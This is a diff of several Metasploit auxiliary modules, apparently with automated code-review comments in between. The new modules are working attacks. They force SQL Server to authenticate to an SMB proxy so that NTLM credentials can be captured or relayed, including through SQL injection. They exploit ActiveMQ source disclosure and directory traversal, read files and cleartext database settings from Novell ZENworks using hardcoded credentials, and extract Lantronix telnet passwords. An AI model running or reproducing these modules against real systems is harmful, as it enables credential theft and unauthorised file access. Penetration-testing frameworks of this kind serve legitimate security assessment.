['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
],
'DisclosureDate' => 'Feb 10 2009',


@ -0,0 +1,78 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server NTLM Stealer',
'Description' => %q{
This module can be used to help capture or relay the LM/NTLM credentials of the
account running the remote SQL Server service. The module will use the supplied
credentials to connect to the target SQL Server instance and execute the native
"xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then
force the service account to authenticate to the system defined in the SMBProxy
option. In order for the attack to be successful, the SMB capture or relay module
must be running on the system defined as the SMBProxy. The database account used
to connect to the database should only require the "PUBLIC" role to execute.
Successful execution of this attack usually results in local administrative access
to the Windows system. Specifically, this works great for relaying credentials
between two SQL Servers using a shared service account to get shells. However, if
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the
inspiration.
},
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
'License' => MSF_LICENSE,
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
register_options(
[
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
], self.class)
end
def run_host(ip)
# Reminder
print_status("DONT FORGET to run a SMB capture or relay module!")
# Call auth_force method to execute "xp_dirtree"
begin
force_auth("xp_dirtree",datastore['SMBPROXY'])
return
rescue
print_error("xp_dirtree failed to initiate authentication to smbproxy.")
end
# Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
begin
force_auth("xp_fileexist",datastore['SMBPROXY'])
return
rescue
print_error("xp_fileexist failed to initiate authentication to smbproxy.")
end
end
# Method to force sql server to authenticate
def force_auth(sprocedure,smbproxy)
print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
# Generate random file name
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
# Setup query
sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
result = mssql_query(sql, false) if mssql_login_datastore
column_data = result[:rows]
print_good("Successfully executed #{sprocedure} on #{rhost}")
print_good("Go check your SMB relay or capture module for goodies!")
end
end
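Review bot: In force_auth, `mssql_query` only runs when `mssql_login_datastore` is truthy, so on a failed login `result` is nil and `result[:rows]` raises NoMethodError; run_host then catches that with a bare `rescue` and reports `xp_dirtree failed to initiate authentication to smbproxy.`, which misattributes a login failure to the stored procedure. Check `mssql_login_datastore` explicitly and report the login failure on its own, and drop `column_data`, which is assigned and never read. `Rex::Text.rand_text_alpha(8, bad='')` creates a stray local `bad` as a side effect of passing the argument — `Rex::Text.rand_text_alpha(8)` is the intended call; the same pattern appears in the SQLi variant's `run` in the next file section. The two `print_good` lines also fire unconditionally, since nothing in the discarded query result is inspected before success is announced.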


@ -0,0 +1,60 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server NTLM Stealer - SQLi',
'Description' => %q{
This module can be used to help capture or relay the LM/NTLM credentials of the
account running the remote SQL Server service. The module will use the SQL
injection from GET_PATH to connect to the target SQL Server instance and execute
the native "xp_dirtree" or stored procedure. The stored procedures will then
force the service account to authenticate to the system defined in the SMBProxy
option. In order for the attack to be successful, the SMB capture or relay module
must be running on the system defined as the SMBProxy. The database account used to
connect to the database should only require the "PUBLIC" role to execute.
Successful execution of this attack usually results in local administrative access
to the Windows system. Specifically, this works great for relaying credentials
between two SQL Servers using a shared service account to get shells. However, if
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
and john the ripper.
},
'Author' =>
[
'nullbind <scott.sutherland[at]netspi.com>',
'Antti <antti.rantasaari[at]netspi.com>'
],
'License' => MSF_LICENSE,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
register_options(
[
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
], self.class)
end
def run
# Reminder
print_status("DONT FORGET to run a SMB capture or relay module!")
# Generate random file name
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
# Setup query - double escaping backslashes
sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'"
print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}")
# Execute query to force authentation from backend database to smbproxy
mssql_query(sql)
end
end


@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
],
# Tested OK against sol8.tor 20100624 -jjd
'Privileged' => true,
'DisclosureDate' => 'Jan 22 2003')
register_options(


@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'OSVDB', '71420'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
[ 'EDB', 17078 ],
[ 'EDB', '17078' ],
],
'DisclosureDate' => 'Mar 28 2011'))


@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2010-2156' ],
[ 'OSVDB', '65246'],
[ 'EDB', 14185]
[ 'EDB', '14185']
]
)
register_options(


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
[ 'EDB', 15940 ],
[ 'EDB', '15940' ],
],
'DisclosureDate' => 'Jan 8 2011' ))


@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'https://issues.apache.org/bugzilla/show_bug.cgi?id=48509' ],
[ 'URL', 'http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
[ 'EDB', 11650 ]
[ 'EDB', '11650' ]
],
'DisclosureDate' => 'Mar 05 2010'))


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '49303'],
[ 'CVE', '2011-3192'],
[ 'EDB', 17696],
[ 'EDB', '17696'],
[ 'OSVDB', '74721' ],
],
'DisclosureDate' => 'Aug 19 2011'))


@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
Code execution may be possible however this module is only a DoS.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>


@ -40,10 +40,9 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '70167' ],
[ 'BID', '45542' ],
[ 'MSB', 'MS11-004' ],
[ 'EDB', 15803 ],
[ 'EDB', '15803' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]
],
'Platform' => [ 'win' ],
'DisclosureDate' => 'Dec 21 2010'))
register_options(


@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'References' =>
[
[ 'EDB', 16204 ],
[ 'EDB', '16204' ],
],
'DisclosureDate' => 'Feb 22 2011'))


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-1899' ],
[ 'OSVDB', '67978'],
[ 'MSB', 'MS10-065'],
[ 'EDB', 15167 ]
[ 'EDB', '15167' ]
],
'DisclosureDate' => 'Sep 14 2010'))


@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
[ 'EDB', 18606 ],
[ 'EDB', '18606' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update' ]
],
'Author' =>


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '46360' ],
[ 'OSVDB', '70881' ],
[ 'MSB', 'MS11-019' ],
[ 'EDB', 16166 ],
[ 'EDB', '16166' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
],
'Author' => [ 'Cupidon-3005', 'jduck' ],


@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2010-2115' ],
[ 'OSVDB', '64845' ],
[ 'EDB', 12683 ]
[ 'EDB', '12683' ]
],
'DisclosureDate' => 'May 21 2010'))


@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'Version' => '$Revision$',
'DisclosureDate' => 'Jan 19 2012'
))


@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
'Version' => '$Revision: 13962 $',
'Version' => '$Revision$',
'Description' => %q{
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
},


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'H.323 Version Scanner',
'Version' => '$Revision: 9804 $',
'Version' => '$Revision$',
'Description' => 'Detect H.323 Version.',
'Author' => 'hdm',
'License' => MSF_LICENSE


@ -0,0 +1,71 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ JSP files Source Disclosure',
'Description' => %q{
This module exploits a source code disclosure in Apache ActiveMQ. The
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
over Windows 2003 SP2 and Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Veerendra G.G', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-1587' ],
[ 'OSVDB', '64020' ],
[ 'BID', '39636' ],
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
]
))
register_options(
[
Opt::RPORT(8161),
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
], self.class)
end
def run_host(ip)
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => "/#{target_uri.to_s}",
'method' => 'GET',
})
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['TARGETURI'])
path = store_loot(
'apache.activemq',
'text/plain',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end
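Review bot: The request URI `"/#{target_uri.to_s}"` yields a doubled leading slash whenever TARGETURI already starts with `/` (as the default `/admin/index.jsp` does), and per the module description that prefix is the whole point of the request rather than an accident; without a comment a later cleanup is likely to normalise it away, so add `# the extra leading "/" is deliberate — see Description` above the `send_request_cgi` call. `if res and res.code == 200` should use `&&`, matching the boolean style elsewhere in the framework, and the trailing `return` at the end of run_host's else branch is a no-op since the method ends there. Loot is also stored whenever the status is 200, even for an empty body; checking `res.body` is non-empty before `store_loot` would avoid saving blank files as "disclosed source".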


@ -0,0 +1,80 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in Apache ActiveMQ
5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
ResourceHandler installed with the affected versions. This module has been tested
successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AbdulAziz Hariri', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '86401' ],
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
[ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
]
))
register_options(
[
Opt::RPORT(8161),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
], self.class)
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("#{rhost}:#{rport} - Please supply FILEPATH")
return
end
travs = "/\\.." * (datastore['DEPTH'] || 1)
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
travs << datastore['FILEPATH']
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => travs,
'method' => 'GET',
})
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'apache.activemq',
'application/octet-stream',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end
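Review bot: `travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"` only compares strings under Ruby 1.9; if Ruby 1.8 is still a supported interpreter, `String#[0]` yields an Integer there, both comparisons are always false and a leading separator is doubled. `travs << "/" unless datastore['FILEPATH'].start_with?("\\", "/")` behaves the same on both and reads more directly; the identical line appears in the DEPTH branch of the Novell ZENworks GetFile module added in this commit. The DEPTH option text `'Traversal depth if absolute is set to false'` refers to an ABSOLUTE option this module does not register, so `'Number of directory levels to traverse'` would describe it correctly. Finally, `if res and res.code == 200` stores any 200 body as loot, so a 200 error page is reported as a successful download; either a comment stating that the server answers misses with a non-200 code, or a minimal body check, would make that assumption explicit.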


@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
'Version' => '$Revision: $',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to read a remote file from the server using a
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability


@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
['EDB', 12721],
['EDB', '12721'],
['OSVDB', '59001'],
],
'Author' =>


@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
['OSVDB', '68301'],
['URL', 'http://secunia.com/advisories/41609/'],
['EDB', 15130]
['EDB', '15130']
],
'Author' =>
[


@ -1,112 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'net/http'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Del.icio.us Domain Links (URLs) Enumerator',
'Description' => %q{
This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages.
},
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
], self.class)
register_advanced_options(
[
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
], self.class)
end
def pull_urls(targetdom)
response = ""
list = []
lastpage = 0
pagenum = 1
while lastpage == 0
print_status("Page number: " + pagenum.to_s)
header = { 'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"}
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.delicious.com")
resp = clnt.get2("/search?p=site%3A"+targetdom+"&page="+pagenum.to_s,header)
response << resp.body
response.each_line do |line|
list << line.gsub!(/(.+<a rel=\"nofollow)(.+=+\")(.+)(\".+)/, '\3')
end
if /pn\ next/.match(data)
pagenum += 1
else
lastpage = 1
end
end
list.delete_if{|x| x==nil}
list.uniq!
list.sort!
return list
end
def write_output(data)
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
file_name = datastore['OUTFILE']
if FileTest::exist?(file_name)
print_status("OUTFILE already existed, appending..")
else
print_status("OUTFILE did not exist, creating..")
end
File.open(file_name, 'ab') do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@proxyuser = datastore['PROXY_USER']
@proxypass = datastore['PROXY_PASS']
else
@proxysrv,@proxyport = nil, nil
end
target = datastore['DOMAIN']
urls = []
print_status("Pulling urls from Delicious.com")
urls = pull_urls(target)
print_status("Located #{urls.count} addresses for #{target}")
if datastore['OUTFILE']
write_output(urls.join)
else
urls.each do |i|
print_status(i)
end
end
end
end


@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
This module pulls and parses the URLs stored by Archive.org for the purpose of
replaying during a web assessment. Finding unlinked and old pages.
},
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))


@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
This module can be used to enumerate information
about an IP addresses from Project HoneyPot's HTTP Block List.
},
'Author' => [ 'Rob Fuller <mubix[at]rapid7.com>' ],
'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>


@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-2333' ],
[ 'OSVDB', '65476' ],
[ 'BID', '40815' ],
[ 'EDB', 13850 ]
[ 'EDB', '13850' ]
],
'Author' =>
[


@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
['CVE', '2011-0063'],
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
['EDB', 16103]
['EDB', '16103']
],
'DisclosureDate' => 'Mar 08 2011',
'License' => MSF_LICENSE


@ -31,8 +31,8 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-2263' ],
[ 'OSVDB', '65531' ],
[ 'BID', '40760' ],
[ 'EDB', 13818 ],
[ 'EDB', 13822 ]
[ 'EDB', '13818' ],
[ 'EDB', '13822' ]
],
'Author' =>
[


@ -0,0 +1,97 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management 7.5 Remote File Access',
'Description' => %q{
This module exploits a hardcoded user and password for the GetFile maintenance
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
Console and can be triggered by sending a specially crafted request to the rtrlet component,
allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of
remote files. This module has been successfully tested on Novell ZENworks Asset
Management 7.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez' # Also the discoverer
],
'References' =>
[
[ 'CVE', '2012-4933' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ] ]
))
register_options(
[
Opt::RPORT(8080),
OptBool.new('ABSOLUTE', [ true, 'Use an absolute file path or directory traversal relative to the tomcat home', true ]),
OptString.new('FILEPATH', [true, 'The name of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']),
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 1])
], self.class)
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("Please supply the name of the file you want to download")
return
end
post_data = "kb=100000000&"
if datastore['ABSOLUTE']
post_data << "file=#{datastore['FILEPATH']}&"
post_data << "absolute=yes&"
else
travs = "../" * (datastore['DEPTH'] || 1)
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
travs << datastore['FILEPATH']
post_data << "file=#{travs}&"
post_data << "absolute=no&"
end
post_data << "maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit"
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => '/rtrlet/rtr',
'method' => 'POST',
'data' => post_data,
}, 5)
if res and res.code == 200 and res.body =~ /Last 100000000 kilobytes of/ and res.body =~ /File name/ and not res.body =~ /<br\/>File not found.<br\/>/
print_good("#{rhost}:#{rport} - File retrieved successfully!")
start_contents = res.body.index("<pre>") + 7
end_contents = res.body.rindex("</pre>") - 1
if start_contents.nil? or end_contents.nil?
print_error("#{rhost}:#{rport} - Error reading file contents")
return
end
contents = res.body[start_contents..end_contents]
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'novell.zenworks_asset_management',
'application/octet-stream',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end
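Review bot: The guard `if start_contents.nil? or end_contents.nil?` can never fire, because `res.body.index("<pre>") + 7` and `res.body.rindex("</pre>") - 1` on the two lines above it already raise NoMethodError on a nil index before the check is reached. Compute the raw indexes first, test them, and apply the offsets afterwards, as below. The `+ 7` also deserves a comment, since `<pre>` is five characters and the extra two presumably skip a line break; something like `# skip '<pre>' and the two bytes after it (CRLF?) — confirm against a live response` would make the constant self-explanatory.
```ruby
print_good("#{rhost}:#{rport} - File retrieved successfully!")
pre_start = res.body.index("<pre>")
pre_end = res.body.rindex("</pre>")
if pre_start.nil? or pre_end.nil?
	print_error("#{rhost}:#{rport} - Error reading file contents")
	return
end
# offsets kept as in the original: skip "<pre>" plus two bytes, stop one byte before "</pre>" — confirm
contents = res.body[(pre_start + 7)..(pre_end - 1)]
# … unchanged: store_loot call and status output …
```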


@ -0,0 +1,74 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management 7.5 Configuration Access',
'Description' => %q{
This module exploits a hardcoded user and password for the GetConfig maintenance
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
Console and can be triggered by sending a specially crafted request to the rtrlet component,
allowing a remote unauthenticated user to retrieve the configuration parameters of
Nozvell Zenworks Asset Managmment, including the database credentials in clear text.
This module has been successfully tested on Novell ZENworks Asset Management 7.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez' # Also the discoverer
],
'References' =>
[
[ 'CVE', '2012-4933' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ]
]
))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def run_host(ip)
post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => '/rtrlet/rtr',
'method' => 'POST',
'data' => post_data,
}, 5)
if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
print_good("#{rhost}:#{rport} - File retrieved successfully!")
path = store_loot(
'novell.zenworks_asset_management.config',
'text/html',
ip,
res.body,
nil,
"Novell ZENworks Asset Management Configuration"
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
return
end
end
end
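Review bot: The success line `print_good("#{rhost}:#{rport} - File retrieved successfully!")` reads as copied from the GetFile module, but this request returns configuration parameters rather than a file; the failure branch already says `Failed to retrieve configuration`, so `print_good("#{rhost}:#{rport} - Configuration retrieved successfully!")` keeps the two consistent. The description states that the page carries database credentials in clear text, yet the module only stores the whole HTML body as loot; if extracting and reporting them is deliberately out of scope, a one-line comment on the store_loot call (`# Raw page is stored as loot; credentials are not parsed out here`) would spare the next reader a search. The trailing `return` in the else branch is redundant at the end of the method.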


@ -101,7 +101,8 @@ class Metasploit3 < Msf::Auxiliary
begin
smb_login()
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
rescue ::Rex::Proto::SMB::Exceptions::LoginError
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
begin
@ -135,7 +136,8 @@ class Metasploit3 < Msf::Auxiliary
begin
smb_login()
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
rescue ::Rex::Proto::SMB::Exceptions::LoginError
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
disconnect()
@ -154,7 +156,8 @@ class Metasploit3 < Msf::Auxiliary
connect()
begin
smb_login()
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
rescue ::Rex::Proto::SMB::Exceptions::LoginError
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
disconnect()
datastore['SMBDomain'] = orig_domain
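Review bot: Each rewritten rescue clause now has an empty body, so both `LoginError` and the newly added `ErrorCode` are discarded without any trace, and nothing on the visible lines shows the outcome being examined afterwards; the hunk at line 101 and the two that follow it share this. If a rejected login is the expected result at these points, a one-line comment such as `# a rejected login is expected here; the result is evaluated below` would make the intent explicit, otherwise a `vprint_error` carrying the exception message would keep the failure visible to the operator. The enclosing methods start and end outside these hunks.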


@ -0,0 +1,94 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Lantronix Telnet Password Recovery',
'Description' => %q{
This module retrieves the setup record from Lantronix serial-to-ethernet
devices via the config port (30718/udp, enabled by default) and extracts the
telnet password. It has been tested successfully on a Lantronix Device Server
with software version V5.8.0.1.
},
'Author' => 'jgor',
'License' => MSF_LICENSE
)
register_options(
[
Opt::CHOST,
Opt::RPORT(30718)
], self.class)
end
def run_host(ip)
setup_probe = "\x00\x00\x00\xF8"
password = nil
begin
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
udp_sock = Rex::Socket::Udp.create( {
'LocalHost' => datastore['CHOST'] || nil,
'PeerHost' => ip,
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
})
udp_sock.put(setup_probe)
res = udp_sock.recvfrom(65535, 0.5) and res[1]
if res
password = parse_reply(res)
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
print_error("Connection error")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
udp_sock.close if udp_sock
end
if password
print_good("#{rhost} - Telnet password found: #{password.to_s}")
report_auth_info({
:host => rhost,
:port => 9999,
:sname => 'telnet',
:duplicate_ok => false,
:pass => password,
})
end
end
def parse_reply(pkt)
setup_record = pkt[0]
# If response is a setup record, extract password bytes 13-16
if setup_record[3].ord == 0xF9
return setup_record[12,4]
else
return nil
end
end
end
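Review bot: On `res = udp_sock.recvfrom(65535, 0.5) and res[1]`, `and` binds lower than `=`, so `res` receives the whole recvfrom result and the `res[1]` test is evaluated and discarded; `if res` on the next line is then true whenever recvfrom returns at all. Splitting it into `res = udp_sock.recvfrom(65535, 0.5)` followed by `password = parse_reply(res) if res and res[1]` restores the intended peer-address check. parse_reply also dereferences `setup_record[3].ord` unconditionally, so a reply shorter than four bytes raises NoMethodError and surfaces as "Unknown error"; `return nil unless setup_record and setup_record.length >= 16` at its top would handle short or empty data. `rescue ::Exception => e` is wider than needed here; `rescue ::StandardError => e` leaves SystemExit and similar untouched.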


@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
[
['BID', '51182'],
['CVE', '2011-4862'],
['EDB', 18280],
['EDB', '18280'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']
]
)


@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
['OSVDB', '77455'],
['BID', '50890'],
['EDB', 18189],
['EDB', '18189'],
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
],
'DisclosureDate' => "Dec 12 2011"


@ -0,0 +1,64 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
